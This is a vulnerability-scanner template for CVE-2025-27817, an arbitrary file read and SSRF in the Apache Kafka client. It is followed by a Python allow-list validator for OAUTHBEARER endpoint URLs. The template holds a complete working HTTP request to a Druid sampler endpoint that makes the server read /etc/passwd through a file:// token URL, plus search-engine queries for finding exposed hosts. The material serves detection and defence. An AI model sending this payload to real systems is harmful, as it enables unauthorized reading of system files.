Apache Kafka Client contains an arbitrary file read and server-side request forgery vulnerability caused by untrusted configuration of sasl.oauthbearer.token.endpoint.url and sasl.oauthbearer.jwks.endpoint.url, letting attackers read files or send requests to unintended locations. Exploitation requires that an untrusted party be able to specify client configurations.
PoC code [publicly available]
id: CVE-2025-27817

info:
  name: Apache Kafka Client - Arbitrary File Read
  author: 0x_Akoko
  severity: high
  description: |
    Apache Kafka Client contains an arbitrary file read and server-side request forgery vulnerability caused by untrusted configuration of sasl.oauthbearer.token.endpoint.url and sasl.oauthbearer.jwks.endpoint.url, letting attackers read files or send requests to unintended locations. Exploitation requires that an untrusted party be able to specify client configurations.
  impact: |
    Attackers can read arbitrary files or make unintended network requests, potentially exposing sensitive data or causing unauthorized interactions.
  remediation: |
    Update to Apache Kafka 4.0.0 or later and configure allowed URLs using the -Dorg.apache.kafka.sasl.oauthbearer.allowed.urls system property.
  reference:
    - https://github.com/kk12-30/CVE-2025-27817
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27817
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-27817
    cwe-id: CWE-918
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.title:"Apache kafka"
    fofa-query: title="Apache Kafka"
  tags: cve,cve2025,apache,lfi,file-read,ssrf,kafka,oss

http:
  - raw:
      - |
        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:6666","sasl.mechanism":"OAUTHBEARER","security.protocol":"SASL_SSL","sasl.login.callback.handler.class":"org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler","sasl.oauthbearer.token.endpoint.url":"file:///etc/passwd","sasl.jaas.config":"org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"},"topic":"test","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Malformed JWT provided"
          - "RecordSupplier"
        condition: and

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 400
# digest: 490a00463044022049f0d70ef8adf7e5e7d078a88f6f2d1244ea1fb4a443c1e1288ddf950bbcb7740220033165806c01875c79e73000dedc4d37282308bcb894e527d14c7fa407781807:922c64590222798bb761d5b6d8e72950
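A defender-side check, added here as an example and not part of the template or of the Kafka project: it applies the allow-list idea behind the allowed.urls remediation to a consumer configuration before it is handed to a Kafka client, checking both the top-level OAUTHBEARER endpoint keys and the copies embedded in sasl.jaas.config, which the PoC above sets in both places. The allow-list entries, the helper names and the trimmed sample properties are constructed for this example.

```python
"""Allow-list check for OAUTHBEARER endpoint URLs in a Kafka consumer config."""
import re
from urllib.parse import urlparse

# Config keys whose values the Kafka client fetches (the sink in CVE-2025-27817).
URL_KEYS = ("sasl.oauthbearer.token.endpoint.url",
            "sasl.oauthbearer.jwks.endpoint.url")

# Constructed allow-list; a deployment would mirror the URLs it passes to
# -Dorg.apache.kafka.sasl.oauthbearer.allowed.urls.
ALLOWED_URLS = {"https://idp.example.internal/oauth2/token",
                "https://idp.example.internal/oauth2/jwks"}

def jaas_options(jaas_config):
    """Extract key=value options from a JAAS config string (quoted or bare values)."""
    opts = {}
    for m in re.finditer(r'([\w.]+)=(?:"([^"]*)"|(\S+?))(?=\s|;|$)', jaas_config):
        opts[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return opts

def find_endpoint_urls(props):
    """Collect (key, url) pairs from top-level keys and from sasl.jaas.config."""
    found = [(k, props[k]) for k in URL_KEYS if k in props]
    for k, v in jaas_options(props.get("sasl.jaas.config", "")).items():
        if k in URL_KEYS:
            found.append(("sasl.jaas.config/" + k, v))
    return found

def validate(props, allowed=ALLOWED_URLS):
    """Return rejection reasons; an empty list means the config may be used."""
    problems = []
    for key, url in find_endpoint_urls(props):
        scheme = urlparse(url).scheme.lower()
        if scheme != "https":   # blocks file:// reads and plain-http SSRF targets
            problems.append(f"{key}: scheme '{scheme}' not permitted ({url})")
        elif url not in allowed:
            problems.append(f"{key}: not on allow-list ({url})")
    return problems

# Constructed subset of the PoC request's consumerProperties (file:// and http://).
POC_PROPS = {
    "sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
    "sasl.jaas.config": (
        "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required "
        'sasl.oauthbearer.token.endpoint.url="http://127.0.0.1:9999/token" '
        'sasl.oauthbearer.jwks.endpoint.url="http://127.0.0.1:9999/jwks" '
        "sasl.oauthbearer.client.id=your-client-id useFirstPass=true debug=true;"),
}

if __name__ == "__main__":
    for reason in validate(POC_PROPS):
        print("REJECT", reason)
```

Run against the PoC properties it reports three rejections (the file:// token URL and the two http:// URLs inside the JAAS string); a config whose URLs are https and on the allow-list returns an empty list.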